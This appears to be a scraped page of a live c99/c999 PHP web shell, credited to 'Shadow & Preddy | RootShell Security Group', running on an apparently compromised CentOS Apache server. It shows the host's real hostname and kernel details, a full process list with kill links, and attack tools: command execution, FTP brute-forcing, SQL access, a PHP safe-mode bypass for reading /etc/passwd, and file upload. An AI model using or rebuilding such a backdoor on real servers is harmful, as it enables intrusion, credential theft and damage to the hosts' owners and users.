!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/share/locale/be/   drwxr-xr-x
Free 49.89 GB of 127.8 GB (39.03%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Processes:
USERPID%CPU%MEMVSZRSSTTYSTATSTARTTIMECOMMAND
root6040.00.000?S<Apr270:00[ata_aux]KILL
root6140.00.000?S<Apr270:00[scsi_eh_1]KILL
root6030.00.000?S<Apr270:00[ata/7]KILL
root6020.00.000?S<Apr270:00[ata/6]KILL
root6000.00.000?S<Apr270:00[ata/4]KILL
root6010.00.000?S<Apr270:00[ata/5]KILL
root6150.00.000?S<Apr270:00[scsi_eh_2]KILL
root6160.00.000?S<Apr270:00[scsi_eh_3]KILL
root7120.00.000?S<Apr273:02[kjournald]KILL
root7380.00.000?S<Apr270:03[kauditd]KILL
root6730.00.000?S<Apr270:00[ksnapd]KILL
root6360.00.000?S<Apr270:00[kstriped]KILL
root6170.00.000?S<Apr270:00[scsi_eh_4]KILL
root5990.00.000?S<Apr270:00[ata/3]KILL
root5980.00.000?S<Apr270:00[ata/2]KILL
root3100.00.000?S<Apr270:00[aio/5]KILL
root3110.00.000?S<Apr270:00[aio/6]KILL
root3090.00.000?S<Apr270:00[aio/4]KILL
root3080.00.000?S<Apr270:00[aio/3]KILL
root3070.00.000?S<Apr270:00[aio/2]KILL
root3120.00.000?S<Apr270:00[aio/7]KILL
root30040.00.000?S<Apr270:00[krfcommd]KILL
root5960.00.000?S<Apr270:00[ata/0]KILL
root5970.00.000?S<Apr270:00[ata/1]KILL
root5860.00.000?S<Apr270:00[scsi_eh_0]KILL
root5850.00.000?S<Apr270:00[mpt/0]KILL
root5840.00.000?S<Apr270:00[mpt_poll_0]KILL
root294140.00.000?S04:020:00[pdflush]KILL
root71670.00.000?SMay220:00[pdflush]KILL
root28260.00.000?S<Apr270:00[kondemand/7]KILL
root28900.00.000?S<Apr270:00[rpciod/0]KILL
root28250.00.000?S<Apr270:00[kondemand/6]KILL
root28240.00.000?S<Apr270:00[kondemand/5]KILL
root28230.00.000?S<Apr270:00[kondemand/4]KILL
root28910.00.000?S<Apr270:00[rpciod/1]KILL
root28920.00.000?S<Apr270:00[rpciod/2]KILL
root28960.00.000?S<Apr270:00[rpciod/6]KILL
root28970.00.000?S<Apr270:00[rpciod/7]KILL
root28950.00.000?S<Apr270:00[rpciod/5]KILL
root28940.00.000?S<Apr270:00[rpciod/4]KILL
root28930.00.000?S<Apr270:00[rpciod/3]KILL
root28220.00.000?S<Apr270:00[kondemand/3]KILL
root28210.00.000?S<Apr270:00[kondemand/2]KILL
root21600.00.000?S<Apr270:00[kmpathd/3]KILL
root21610.00.000?S<Apr270:00[kmpathd/4]KILL
root21590.00.000?S<Apr270:00[kmpathd/2]KILL
root21580.00.000?S<Apr270:00[kmpathd/1]KILL
root21570.00.000?S<Apr270:00[kmpathd/0]KILL
root21620.00.000?S<Apr270:00[kmpathd/5]KILL
root21630.00.000?S<Apr270:00[kmpathd/6]KILL
root28190.00.000?S<Apr270:00[kondemand/0]KILL
root28200.00.000?S<Apr270:00[kondemand/1]KILL
root22350.00.000?S<Apr270:00[kjournald]KILL
root21650.00.000?S<Apr270:00[kmpath_handlerd]KILL
root21640.00.000?S<Apr270:00[kmpathd/7]KILL
root3060.00.000?S<Apr270:00[aio/1]KILL
root4790.00.000?S<Apr270:00[kpsmoused]KILL
root260.00.000?S<Apr270:00[events/0]KILL
root270.00.000?S<Apr270:00[events/1]KILL
root250.00.000?S<Apr270:00[watchdog/7]KILL
root240.00.000?SNApr270:00[ksoftirqd/7]KILL
root220.00.000?S<Apr270:00[watchdog/6]KILL
root230.00.000?S<Apr270:00[migration/7]KILL
root3050.00.000?S<Apr270:00[aio/0]KILL
root40.00.000?S<Apr270:00[watchdog/0]KILL
root80.00.000?S<Apr270:00[migration/2]KILL
root280.00.000?S<Apr270:00[events/2]KILL
root20.00.000?S<Apr270:00[migration/0]KILL
root30.00.000?SNApr270:00[ksoftirqd/0]KILL
root90.00.000?SNApr270:00[ksoftirqd/2]KILL
root210.00.000?SNApr270:00[ksoftirqd/6]KILL
root200.00.000?S<Apr270:00[migration/6]KILL
root140.00.000?S<Apr270:00[migration/4]KILL
root150.00.000?SNApr270:00[ksoftirqd/4]KILL
root130.00.000?S<Apr270:00[watchdog/3]KILL
root120.00.000?SNApr270:00[ksoftirqd/3]KILL
root110.00.000?S<Apr270:00[migration/3]KILL
root160.00.000?S<Apr270:00[watchdog/4]KILL
root170.00.000?S<Apr270:03[migration/5]KILL
root180.00.000?SNApr270:00[ksoftirqd/5]KILL
root190.00.000?S<Apr270:00[watchdog/5]KILL
root50.00.000?S<Apr270:02[migration/1]KILL
root60.00.000?SNApr270:02[ksoftirqd/1]KILL
root70.00.000?S<Apr270:00[watchdog/1]KILL
root100.00.000?S<Apr270:00[watchdog/2]KILL
root290.00.000?S<Apr270:00[events/3]KILL
root1910.00.000?S<Apr270:00[cqueue/3]KILL
root1920.00.000?S<Apr270:00[cqueue/4]KILL
root1900.00.000?S<Apr270:00[cqueue/2]KILL
root1890.00.000?S<Apr270:00[cqueue/1]KILL
root1880.00.000?S<Apr270:00[cqueue/0]KILL
root1930.00.000?S<Apr270:00[cqueue/5]KILL
root1940.00.000?S<Apr270:00[cqueue/6]KILL
root3010.00.000?SApr270:00[khungtaskd]KILL
root3040.00.000?S<Apr270:22[kswapd0]KILL
root2000.00.000?S<Apr270:00[kseriod]KILL
root1980.00.000?S<Apr270:00[khubd]KILL
root1950.00.000?S<Apr270:00[cqueue/7]KILL
root530.00.000?S<Apr270:00[kacpid]KILL
root520.00.000?S<Apr270:00[kblockd/7]KILL
root350.00.000?S<Apr270:00[kthread]KILL
root450.00.000?S<Apr270:00[kblockd/0]KILL
root340.00.000?S<Apr270:00[khelper]KILL
root330.00.000?S<Apr270:00[events/7]KILL
root310.00.000?S<Apr270:00[events/5]KILL
root320.00.000?S<Apr270:00[events/6]KILL
root460.00.000?S<Apr270:01[kblockd/1]KILL
root470.00.000?S<Apr270:00[kblockd/2]KILL
root500.00.000?S<Apr270:00[kblockd/5]KILL
root490.00.000?S<Apr270:00[kblockd/4]KILL
root300.00.000?S<Apr270:00[events/4]KILL
root480.00.000?S<Apr270:00[kblockd/3]KILL
root510.00.000?S<Apr270:00[kblockd/6]KILL
avahi34460.00.02600304?SsApr270:00avahi-daemon: chroot helperKILL
root33530.00.01908372?SsApr270:00gpm -m /dev/input/mice -t exps2KILL
root28460.00.02472380?SsApr270:22irqbalanceKILL
root27590.00.01680404?SsApr270:00klogd -xKILL
root35310.00.01664420tty3Ss+Apr270:00/sbin/mingetty tty3KILL
root35290.00.01664424tty1Ss+Apr270:00/sbin/mingetty tty1KILL
root35340.00.01664424tty5Ss+Apr270:00/sbin/mingetty tty5KILL
root35370.00.01664428tty6Ss+Apr270:00/sbin/mingetty tty6KILL
root35300.00.01664428tty2Ss+Apr270:00/sbin/mingetty tty2KILL
root35320.00.01664428tty4Ss+Apr270:00/sbin/mingetty tty4KILL
root34180.00.02268432?SsApr270:00/usr/sbin/atdKILL
root35150.00.03516436?SApr270:00/usr/sbin/smartd -q neverKILL
root31020.00.01916460?SsApr270:00/usr/bin/hidd --serverKILL
root31460.00.05156504?SsApr270:00./hpiodKILL
root30510.00.01676532?SsApr270:00/usr/sbin/acpidKILL
root27560.00.01728572?SsApr270:44syslogd -m 0KILL
root19490.00.02152584?S04:220:00awk -v progname=/etc/cron.weekly/makewhatis.cron progname {????? print progname ":\n"????? progname="";???? }???? { print; }KILL
rpc28570.00.01816628?SsApr270:00portmapKILL
root10.00.02072632?SsApr270:09init [5]KILL
root29340.00.05820644?SsApr270:00rpc.idmapdKILL
root29580.00.02172768?SsApr270:00/usr/sbin/hcidKILL
root27320.00.013544804?S<slApr270:35auditdKILL
6830730.00.02020808?SApr270:00hald-addon-acpi: listening on acpid socket /var/run/acpid.socketKILL
root29100.00.01968828?SsApr270:00rpc.statdKILL
apache14900.00.02184836?R04:230:00ps -auxKILL
root19480.00.02412916?S04:220:00/bin/bash /etc/cron.weekly/makewhatis.cronKILL
root27340.00.013100920?S<slApr270:10/sbin/audispdKILL
root7710.00.02476928?S<sApr270:00/sbin/udevd -dKILL
dbus29490.00.02748948?SsApr270:01dbus-daemon --systemKILL
root19380.00.02412964?Ss04:220:00/bin/bash /usr/bin/run-parts /etc/cron.weeklyKILL
root31640.00.070681064?SsApr271:01/usr/sbin/sshdKILL
root30650.00.031641088?SApr270:00hald-runnerKILL
root33720.00.052881100?SsApr270:00crondKILL
root35230.00.025641124?SNApr270:00/usr/libexec/gam_serverKILL
root32220.00.045361216?SApr270:00/bin/sh /usr/bin/mysqld_safe --datadir=/var/lib/mysql --socket=/var/lib/mysql/mysql.sock --log-error=/var/log/mysqld.log --pid-file=/var/run/mysqld/mysqld.pid --user=mysqlKILL
root14890.00.025481216?R04:230:00/usr/bin/gawk ? ? function readline() {? if (use_zcat || use_bzcat) {? result = (pipe_cmd | getline);? if (result < 0) {? print "Pipe error: " pipe_cmd " " ERRNO > "/dev/stderr";? }? } else {? result = (getline < filename);? if (result < 0) {? print "Read file error: " filename " " ERRNO > "/dev/stderr";? }? }? return result;? }? ? function closeline() {? if (use_zcat || use_bzcat) {? return close(pipe_cmd);? } else {? return close(filename);? }? }? ? function do_one() {? insh = 0; thisjoin = 1; done = 0;? entire_line = "";? ? if (verbose) {? print "adding " filename > "/dev/stderr"? }?? use_zcat = match(filename,"\\.Z$") ||? match(filename,"\\.z$") || match(filename,"\\.gz$");? if (!use_zcat)? use_bzcat = match(filename,"\\.bz2");? if (use_zcat || use_bzcat) {? filename_no_gz = substr(filename, 0, RSTART - 1);? } else {? filename_no_gz = filename;? }? match(filename_no_gz, "/[^/]+$");? progname = substr(filename, RSTART + 1, RLENGTH - 1);? if (match(progname, "\\." section "[A-Za-z]+")) {? actual_section = substr(progname, RSTART + 1, RLENGTH - 1);? } else {? actual_section = section;? }? sub(/\..*/, "", progname);? if (use_zcat || use_bzcat) {? if (use_zcat) {? pipe_cmd = "zcat \"" filename "\" 2>/dev/null";? } else {? pipe_cmd = "bzcat \"" filename "\" 2>/dev/null";? }? # try to avoid suspicious stuff? if (filename ~ /[;&|`$(]/) {? print "ignored strange file name " filename " in " curdir > "/dev/stderr";? return;? }? }?? while (!done && readline() > 0) {? gsub(/.\b/, "");? if (($1 ~ /^\.[Ss][Hh]/ &&? ($2 ~ /[Nn][Aa][Mm][Ee]/ || # en/de? $2 ~ /^JMÃ?NO/ || # cs? $2 ~ /^NAVN/ || # da? $2 ~ /^NUME/ || # ro? $2 ~ /^BEZEICHNUNG/ || # de? $2 ~ /^NOMBRE/ || # es? $2 ~ /^NIMI/ || # fi? $2 ~ /^NOM/ || # fr? $2 ~ /^IME/ || # sh? $2 ~ /^N[Ã?E]V/ || # hu? $2 ~ /^NAMA/ || # XXX: what lang is this?? $2 ~ /^å??å??/ || # ja? $2 ~ /^ì?´ë¦?/ || # ko? $2 ~ /^NAZWA/ || # pl? $2 ~ /^Ð?Ð?Ð?Ð?Ð?Ð?Ð?Ð?/ || # ru? $2 ~ /^å??ç§°/ || # zh_CN/ja? $2 ~ /^å??稱/ || # zh_TW? $2 ~ /^NOME/ || # it/pt? $2 ~ /^NAAM/)) || # nl? (pages == "cat" && $1 ~ /^NAME/)) {? if (!insh) {? insh = 1;? } else {? done = 1;?? }? } else if (insh) {? if ($1 ~ /^\.[Ss][HhYS]/ ||? (pages == "cat" &&? ($1 ~ /^S[yYeE]/ || $1 ~ /^DESCRIPTION/ ||? $1 ~ /^COMMAND/ || $1 ~ /^OVERVIEW/ ||? $1 ~ /^STRUCTURES/ || $1 ~ /^INTRODUCTION/ ||? $0 ~ /^[^ ]/))) {? # end insh for Synopsis, Syntax, but also for? # DESCRIPTION (e.g., XFree86.1x),? # COMMAND (e.g., xspread.1)? # OVERVIEW (e.g., TclCommandWriting.3)? # STRUCTURES (e.g., XEvent.3x)? # INTRODUCTION (e.g., TclX.n)? # and anything at all that begins in Column 1, so? # is probably a section header.? done = 1;? } else {? if ($0 ~ progname"-") { # Fix old cat pages? sub(progname"-", progname" - ");? ? }? ? if ($0 ~ /[^ \\]-$/) {? sub(/-$/, ""); # Handle Hyphenations? nextjoin = 1;? } else if ($0 ~ /\\c$/) {? sub(/\\c$/, ""); # Handle Continuations? nextjoin = 1;? } else? nextjoin = 0;?KILL
root19514.80.026321240?R04:220:02/bin/bash /usr/sbin/makewhatis -wKILL
avahi34450.00.026001288?SsApr270:00avahi-daemon: running [mx-ll-110-164-51-230.local]KILL
root30410.00.0231121364?SslApr270:01pcscdKILL
root31290.00.0303281380?SslApr270:12automountKILL
root19370.00.058641480?S04:220:00crondKILL
smmsp33430.00.081721532?SsApr270:00sendmail: Queue runner@01:00:00 for /var/spool/clientmqueueKILL
xfs34010.00.038401644?SsApr270:00xfs -droppriv -daemonKILL
root33350.00.093321936?SsApr270:00sendmail: accepting connectionsKILL
root36400.00.0161682332?SApr270:00/usr/sbin/gdm-binary -nodaemonKILL
root31730.00.0101442380?SsApr270:00cupsdKILL
root35400.00.0155562880?SsApr270:00/usr/sbin/gdm-binary -nodaemonKILL
root36420.00.0274964184?SlApr270:00/usr/libexec/gdm-rh-security-token-helperKILL
6830640.00.062404312?SsApr270:01haldKILL
ntp31890.00.044004396?SLsApr270:00ntpd -u ntp:ntp -p /var/run/ntpd.pid -gKILL
root31510.00.0134684640?SApr270:00python ./hpssd.pyKILL
root36430.00.0112525240tty7Ss+Apr270:07/usr/bin/Xorg :0 -br -audit 0 -auth /var/gdm/:0.Xauth -nolisten tcp vt7KILL
apache308620.40.0257326984?S04:080:03/usr/sbin/httpdKILL
apache322040.50.0257607016?S04:140:02/usr/sbin/httpdKILL
apache315030.30.0257487032?S04:100:02/usr/sbin/httpdKILL
apache319740.30.0261887580?S04:120:02/usr/sbin/httpdKILL
apache308610.30.0265567876?S04:080:03/usr/sbin/httpdKILL
root33630.00.0228287908?SsApr270:00/usr/sbin/httpdKILL
root35210.00.12607610868?SNApr270:00/usr/bin/python -tt /usr/sbin/yum-updatesdKILL
apache308600.50.12980811256?S04:080:04/usr/sbin/httpdKILL
apache308630.50.13214413336?S04:080:04/usr/sbin/httpdKILL
apache308590.40.13214413352?S04:080:03/usr/sbin/httpdKILL
apache310550.50.13214813444?S04:080:04/usr/sbin/httpdKILL
apache308640.60.13214813480?S04:080:05/usr/sbin/httpdKILL
apache308650.50.13214813492?S04:080:04/usr/sbin/httpdKILL
apache317280.50.13214813528?S04:110:03/usr/sbin/httpdKILL
apache308660.50.13214813536?S04:080:04/usr/sbin/httpdKILL
root35240.00.11564813588?SsApr270:01/usr/bin/perl /usr/libexec/webmin/miniserv.pl /etc/webmin/miniserv.confKILL
gdm36820.00.13134015876?SsApr270:00/usr/libexec/gdmgreeterKILL
mysql32692.76.2643564518972?SlApr271653:39/usr/libexec/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --socket=/var/lib/mysql/mysql.sockKILL

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0301 ]--